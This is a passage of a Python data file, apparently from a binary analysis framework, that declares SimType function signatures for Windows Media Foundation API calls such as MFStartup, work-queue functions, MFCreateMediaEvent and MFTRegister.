'MFCreateTrackedSample': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFTrackedSample"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppMFSample"]),
#
'MFCreateMFByteStreamOnStream': SimTypeFunction([SimTypeBottom(label="IStream"), SimTypePointer(SimTypeBottom(label="IMFByteStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pStream", "ppByteStream"]),
#
'MFCreateStreamOnMFByteStream': SimTypeFunction([SimTypeBottom(label="IMFByteStream"), SimTypePointer(SimTypeBottom(label="IStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pByteStream", "ppStream"]),
#
'MFCreateMFByteStreamOnStreamEx': SimTypeFunction([SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeBottom(label="IMFByteStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["punkStream", "ppByteStream"]),
#
'MFCreateStreamOnMFByteStreamEx': SimTypeFunction([SimTypeBottom(label="IMFByteStream"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pByteStream", "riid", "ppv"]),
#
'MFCreateMediaTypeFromProperties': SimTypeFunction([SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeBottom(label="IMFMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["punkStream", "ppMediaType"]),
#
'MFCreatePropertiesFromMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMediaType", "riid", "ppv"]),
#
'MFCreateContentProtectionDevice': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeBottom(label="IMFContentProtectionDevice"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ProtectionSystemId", "ContentProtectionDevice"]),
#
'MFIsContentProtectionDeviceSupported': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ProtectionSystemId", "isSupported"]),
#
'MFCreateContentDecryptorContext': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypeBottom(label="IMFDXGIDeviceManager"), SimTypeBottom(label="IMFContentProtectionDevice"), SimTypePointer(SimTypeBottom(label="IMFContentDecryptorContext"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidMediaProtectionSystemId", "pD3DManager", "pContentProtectionDevice", "ppContentDecryptorContext"]),
#
'MFStartup': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["Version", "dwFlags"]),
#
'MFShutdown': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MFLockPlatform': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MFUnlockPlatform': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MFPutWorkItem': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwQueue", "pCallback", "pState"]),
#
'MFPutWorkItem2': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwQueue", "Priority", "pCallback", "pState"]),
#
'MFPutWorkItemEx': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeBottom(label="IMFAsyncResult")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwQueue", "pResult"]),
#
'MFPutWorkItemEx2': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypeBottom(label="IMFAsyncResult")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwQueue", "Priority", "pResult"]),
#
'MFPutWaitingWorkItem': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeBottom(label="IMFAsyncResult"), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hEvent", "Priority", "pResult", "pKey"]),
#
'MFAllocateSerialWorkQueue': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueue", "pdwWorkQueue"]),
#
'MFScheduleWorkItemEx': SimTypeFunction([SimTypeBottom(label="IMFAsyncResult"), SimTypeLongLong(signed=True, label="Int64"), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pResult", "Timeout", "pKey"]),
#
'MFScheduleWorkItem': SimTypeFunction([SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown"), SimTypeLongLong(signed=True, label="Int64"), SimTypePointer(SimTypeLongLong(signed=False, label="UInt64"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pCallback", "pState", "Timeout", "pKey"]),
#
'MFCancelWorkItem': SimTypeFunction([SimTypeLongLong(signed=False, label="UInt64")], SimTypeInt(signed=True, label="Int32"), arg_names=["Key"]),
#
'MFGetTimerPeriodicity': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Periodicity"]),
#
'MFAddPeriodicCallback': SimTypeFunction([SimTypePointer(SimTypeFunction([SimTypeBottom(label="IUnknown")], SimTypeBottom(label="Void"), arg_names=["pContext"]), offset=0), SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Callback", "pContext", "pdwKey"]),
#
'MFRemovePeriodicCallback': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwKey"]),
#
'MFAllocateWorkQueueEx': SimTypeFunction([SimTypeInt(signed=False, label="MFASYNC_WORKQUEUE_TYPE"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["WorkQueueType", "pdwWorkQueue"]),
#
'MFAllocateWorkQueue': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pdwWorkQueue"]),
#
'MFLockWorkQueue': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueue"]),
#
'MFUnlockWorkQueue': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueue"]),
#
'MFBeginRegisterWorkQueueWithMMCSS': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueueId", "wszClass", "dwTaskId", "pDoneCallback", "pDoneState"]),
#
'MFBeginRegisterWorkQueueWithMMCSSEx': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueueId", "wszClass", "dwTaskId", "lPriority", "pDoneCallback", "pDoneState"]),
#
'MFEndRegisterWorkQueueWithMMCSS': SimTypeFunction([SimTypeBottom(label="IMFAsyncResult"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pResult", "pdwTaskId"]),
#
'MFBeginUnregisterWorkQueueWithMMCSS': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown")], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueueId", "pDoneCallback", "pDoneState"]),
#
'MFEndUnregisterWorkQueueWithMMCSS': SimTypeFunction([SimTypeBottom(label="IMFAsyncResult")], SimTypeInt(signed=True, label="Int32"), arg_names=["pResult"]),
#
'MFGetWorkQueueMMCSSClass': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueueId", "pwszClass", "pcchClass"]),
#
'MFGetWorkQueueMMCSSTaskId': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueueId", "pdwTaskId"]),
#
'MFRegisterPlatformWithMMCSS': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["wszClass", "pdwTaskId", "lPriority"]),
#
'MFUnregisterPlatformFromMMCSS': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MFLockSharedWorkQueue': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["wszClass", "BasePriority", "pdwTaskId", "pID"]),
#
'MFGetWorkQueueMMCSSPriority': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWorkQueueId", "lPriority"]),
#
'MFCreateAsyncResult': SimTypeFunction([SimTypeBottom(label="IUnknown"), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeBottom(label="IMFAsyncResult"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["punkObject", "pCallback", "punkState", "ppAsyncResult"]),
#
'MFInvokeCallback': SimTypeFunction([SimTypeBottom(label="IMFAsyncResult")], SimTypeInt(signed=True, label="Int32"), arg_names=["pAsyncResult"]),
#
'MFCreateFile': SimTypeFunction([SimTypeInt(signed=False, label="MF_FILE_ACCESSMODE"), SimTypeInt(signed=False, label="MF_FILE_OPENMODE"), SimTypeInt(signed=False, label="MF_FILE_FLAGS"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeBottom(label="IMFByteStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["AccessMode", "OpenMode", "fFlags", "pwszFileURL", "ppIByteStream"]),
#
'MFCreateTempFile': SimTypeFunction([SimTypeInt(signed=False, label="MF_FILE_ACCESSMODE"), SimTypeInt(signed=False, label="MF_FILE_OPENMODE"), SimTypeInt(signed=False, label="MF_FILE_FLAGS"), SimTypePointer(SimTypeBottom(label="IMFByteStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["AccessMode", "OpenMode", "fFlags", "ppIByteStream"]),
#
'MFBeginCreateFile': SimTypeFunction([SimTypeInt(signed=False, label="MF_FILE_ACCESSMODE"), SimTypeInt(signed=False, label="MF_FILE_OPENMODE"), SimTypeInt(signed=False, label="MF_FILE_FLAGS"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeBottom(label="IMFAsyncCallback"), SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeBottom(label="IUnknown"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["AccessMode", "OpenMode", "fFlags", "pwszFilePath", "pCallback", "pState", "ppCancelCookie"]),
#
'MFEndCreateFile': SimTypeFunction([SimTypeBottom(label="IMFAsyncResult"), SimTypePointer(SimTypeBottom(label="IMFByteStream"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pResult", "ppFile"]),
#
'MFCancelCreateFile': SimTypeFunction([SimTypeBottom(label="IUnknown")], SimTypeInt(signed=True, label="Int32"), arg_names=["pCancelCookie"]),
#
'MFCreateMemoryBuffer': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["cbMaxLength", "ppBuffer"]),
#
'MFCreateMediaBufferWrapper': SimTypeFunction([SimTypeBottom(label="IMFMediaBuffer"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pBuffer", "cbOffset", "dwLength", "ppBuffer"]),
#
'MFCreateLegacyMediaBufferOnMFMediaBuffer': SimTypeFunction([SimTypeBottom(label="IMFSample"), SimTypeBottom(label="IMFMediaBuffer"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pSample", "pMFMediaBuffer", "cbOffset", "ppMediaBuffer"]),
#
'MFMapDX9FormatToDXGIFormat': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="DXGI_FORMAT"), arg_names=["dx9"]),
#
'MFMapDXGIFormatToDX9Format': SimTypeFunction([SimTypeInt(signed=False, label="DXGI_FORMAT")], SimTypeInt(signed=False, label="UInt32"), arg_names=["dx11"]),
#
'MFLockDXGIDeviceManager': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="IMFDXGIDeviceManager"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pResetToken", "ppManager"]),
#
'MFUnlockDXGIDeviceManager': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MFCreateDXSurfaceBuffer': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypeBottom(label="IUnknown"), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["riid", "punkSurface", "fBottomUpWhenLinear", "ppBuffer"]),
#
'MFCreateWICBitmapBuffer': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypeBottom(label="IUnknown"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["riid", "punkSurface", "ppBuffer"]),
#
'MFCreateDXGISurfaceBuffer': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypeBottom(label="IUnknown"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["riid", "punkSurface", "uSubresourceIndex", "fBottomUpWhenLinear", "ppBuffer"]),
#
'MFCreateVideoSampleAllocatorEx': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypePointer(SimTypeBottom(label="Void"), offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["riid", "ppSampleAllocator"]),
#
'MFCreateDXGIDeviceManager': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="IMFDXGIDeviceManager"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["resetToken", "ppDeviceManager"]),
#
'MFCreateAlignedMemoryBuffer': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["cbMaxLength", "cbAligment", "ppBuffer"]),
#
'MFCreateMediaEvent': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimStruct({"Anonymous": SimUnion({"Anonymous": SimStruct({"vt": SimTypeShort(signed=False, label="UInt16"), "wReserved1": SimTypeShort(signed=False, label="UInt16"), "wReserved2": SimTypeShort(signed=False, label="UInt16"), "wReserved3": SimTypeShort(signed=False, label="UInt16"), "Anonymous": SimUnion({"cVal": SimTypeBottom(label="CHAR"), "bVal": SimTypeChar(label="Byte"), "iVal": SimTypeShort(signed=True, label="Int16"), "uiVal": SimTypeShort(signed=False, label="UInt16"), "lVal": SimTypeInt(signed=True, label="Int32"), "ulVal": SimTypeInt(signed=False, label="UInt32"), "intVal": SimTypeInt(signed=True, label="Int32"), "uintVal": SimTypeInt(signed=False, label="UInt32"), "hVal": SimTypeBottom(label="LARGE_INTEGER"), "uhVal": SimTypeBottom(label="ULARGE_INTEGER"), "fltVal": SimTypeFloat(size=32), "dblVal": SimTypeFloat(size=64), "boolVal": SimTypeShort(signed=True, label="Int16"), "__OBSOLETE__VARIANT_BOOL": SimTypeShort(signed=True, label="Int16"), "scode": SimTypeInt(signed=True, label="Int32"), "cyVal": SimTypeBottom(label="CY"), "date": SimTypeFloat(size=64), "filetime": SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), "puuid": SimTypePointer(SimTypeBottom(label="Guid"), offset=0), "pclipdata": SimTypePointer(SimTypeBottom(label="CLIPDATA"), offset=0), "bstrVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "bstrblobVal": SimTypeBottom(label="BSTRBLOB"), "blob": SimTypeBottom(label="BLOB"), "pszVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "pwszVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "punkVal": SimTypeBottom(label="IUnknown"), "pdispVal": SimTypeBottom(label="IDispatch"), "pStream": SimTypeBottom(label="IStream"), "pStorage": SimTypeBottom(label="IStorage"), "pVersionedStream": SimTypePointer(SimStruct({"guidVersion": SimTypeBottom(label="Guid"), "pStream": SimTypeBottom(label="IStream")}, name="VERSIONEDSTREAM", pack=False, align=None), offset=0), "parray": SimTypePointer(SimTypeBottom(label="SAFEARRAY"), offset=0), "cac": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CAC", pack=False, align=None), "caub": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeChar(label="Byte"), offset=0)}, name="CAUB", pack=False, align=None), "cai": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0)}, name="CAI", pack=False, align=None), "caui": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="CAUI", pack=False, align=None), "cal": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)}, name="CAL", pack=False, align=None), "caul": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="CAUL", pack=False, align=None), "cah": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="LARGE_INTEGER"), offset=0)}, name="CAH", pack=False, align=None), "cauh": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="ULARGE_INTEGER"), offset=0)}, name="CAUH", pack=False, align=None), "caflt": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=32), offset=0)}, name="CAFLT", pack=False, align=None), "cadbl": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=64), offset=0)}, name="CADBL", pack=False, align=None), "cabool": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0)}, name="CABOOL", pack=False, align=None), "cascode": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)}, name="CASCODE", pack=False, align=None), "cacy": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="CY"), offset=0)}, name="CACY", pack=False, align=None), "cadate": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeFloat(size=64), offset=0)}, name="CADATE", pack=False, align=None), "cafiletime": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0)}, name="CAFILETIME", pack=False, align=None), "cauuid": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="Guid"), offset=0)}, name="CACLSID", pack=False, align=None), "caclipdata": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="CLIPDATA"), offset=0)}, name="CACLIPDATA", pack=False, align=None), "cabstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)}, name="CABSTR", pack=False, align=None), "cabstrblob": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="BSTRBLOB"), offset=0)}, name="CABSTRBLOB", pack=False, align=None), "calpstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Byte"), offset=0), offset=0)}, name="CALPSTR", pack=False, align=None), "calpwstr": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0)}, name="CALPWSTR", pack=False, align=None), "capropvar": SimStruct({"cElems": SimTypeInt(signed=False, label="UInt32"), "pElems": SimTypePointer(SimTypeBottom(label="PROPVARIANT"), offset=0)}, name="CAPROPVARIANT", pack=False, align=None), "pcVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "pbVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "piVal": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0), "puiVal": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0), "plVal": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "pulVal": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), "pintVal": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "puintVal": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), "pfltVal": SimTypePointer(SimTypeFloat(size=32), offset=0), "pdblVal": SimTypePointer(SimTypeFloat(size=64), offset=0), "pboolVal": SimTypePointer(SimTypeShort(signed=True, label="Int16"), offset=0), "pdecVal": SimTypePointer(SimTypeBottom(label="DECIMAL"), offset=0), "pscode": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "pcyVal": SimTypePointer(SimTypeBottom(label="CY"), offset=0), "pdate": SimTypePointer(SimTypeFloat(size=64), offset=0), "pbstrVal": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "ppunkVal": SimTypePointer(SimTypeBottom(label="IUnknown"), offset=0), "ppdispVal": SimTypePointer(SimTypeBottom(label="IDispatch"), offset=0), "pparray": SimTypePointer(SimTypePointer(SimTypeBottom(label="SAFEARRAY"), offset=0), offset=0), "pvarVal": SimTypePointer(SimTypeBottom(label="PROPVARIANT"), offset=0)}, name="<anon>", label="None")}, name="_Anonymous_e__Struct", pack=False, align=None), "decVal": SimTypeBottom(label="DECIMAL")}, name="<anon>", label="None")}, name="PROPVARIANT", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="IMFMediaEvent"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["met", "guidExtendedType", "hrStatus", "pvValue", "ppEvent"]),
#
'MFCreateEventQueue': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFMediaEventQueue"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppMediaEventQueue"]),
#
'MFCreateSample': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFSample"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppIMFSample"]),
#
'MFCreateAttributes': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFAttributes"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["ppMFAttributes", "cInitialSize"]),
#
'MFInitAttributesFromBlob': SimTypeFunction([SimTypeBottom(label="IMFAttributes"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pAttributes", "pBuf", "cbBufSize"]),
#
'MFGetAttributesAsBlobSize': SimTypeFunction([SimTypeBottom(label="IMFAttributes"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pAttributes", "pcbBufSize"]),
#
'MFGetAttributesAsBlob': SimTypeFunction([SimTypeBottom(label="IMFAttributes"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pAttributes", "pBuf", "cbBufSize"]),
#
'MFTRegister': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypeBottom(label="Guid"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), label="LPArray", offset=0), SimTypeBottom(label="IMFAttributes")], SimTypeInt(signed=True, label="Int32"), arg_names=["clsidMFT", "guidCategory", "pszName", "Flags", "cInputTypes", "pInputTypes", "cOutputTypes", "pOutputTypes", "pAttributes"]),
#
'MFTUnregister': SimTypeFunction([SimTypeBottom(label="Guid")], SimTypeInt(signed=True, label="Int32"), arg_names=["clsidMFT"]),
#
'MFTRegisterLocal': SimTypeFunction([SimTypeBottom(label="IClassFactory"), SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"guidMajorType": SimTypeBottom(label="Guid"), "guidSubtype": SimTypeBottom(label="Guid")}, name="MFT_REGISTER_TYPE_INFO", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pClassFactory", "guidCategory", "pszName", "Flags", "cInputTypes", "pInputTypes", "cOutputTypes", "pOutputTypes"]),
#
'MFTUnregisterLocal': SimTypeFunction([SimTypeBottom(label="IClassFactory")], SimTypeInt(signed=True, label="Int32"), arg_names=["pClassFactory"]),
#
